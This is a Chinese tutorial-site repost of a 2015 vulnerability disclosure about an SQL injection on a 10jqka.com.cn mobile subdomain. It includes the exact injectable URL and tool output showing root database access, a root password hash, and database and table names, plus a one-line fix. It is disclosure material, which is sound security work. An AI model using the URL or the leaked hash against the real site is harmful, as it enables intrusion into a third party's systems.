网站地图    收藏   

主页 > 后端 > 网站安全 >

同花顺某分站的一个注入漏洞 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] db权限:rootpossibile to getshell漏洞证明:http://mobile.10jqka.com.cn/main/dlquery_s.php?bid=%274229bname=%CD%A8%D3%C3%C7%F8seid=1329sename=Androidmid=61mname=Gpadtyid=2705DB Server: MyS......

db权限:root
possibile to getshell
漏洞证明:http://mobile.10jqka.com.cn/main/dlquery_s.php?bid=%274229&bname=%CD%A8%D3%C3%C7%F8&seid=1329&sename=Android&mid=61&mname=Gpad&tyid=2705
 
 
DB Server: MySQL error based
Resp. Time(avg): 2490 ms
Current User: root@localhost
Sql Version: 5.0.95
Current DB: wap3g_dl
System User: root@localhost
Host Name: wapyd
Installation dir: /usr/
DB User & Pass: root::127.0.0.1
::localhost
::localhost.localdomain
root:07846796735f00a7:localhost
Data Bases: information_schema
ahuni_dl
asv
ceshi
ceshi_dl
ceshi_fj
data_web
 
wap3g_dl
Table Name
recordDl_20110601
recordDl_20110531
recordDl_20110530
recordDl_20110529
recordDl_20110528
recordDl_20110527
recordDl_20110526
recordDl_20110525
recordDl_20110524
recordDl_20110523
recordDl
keyword
example_stat
dl_version
dl_verintro
dl_tyrj
dl_sp
dl_soft
dl_series
dl_plateform
dl_new_model
dl_model
dl_config
dl_brand
check_ver
account
修复方案:

输入点需要过滤

作者 insight-labs

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论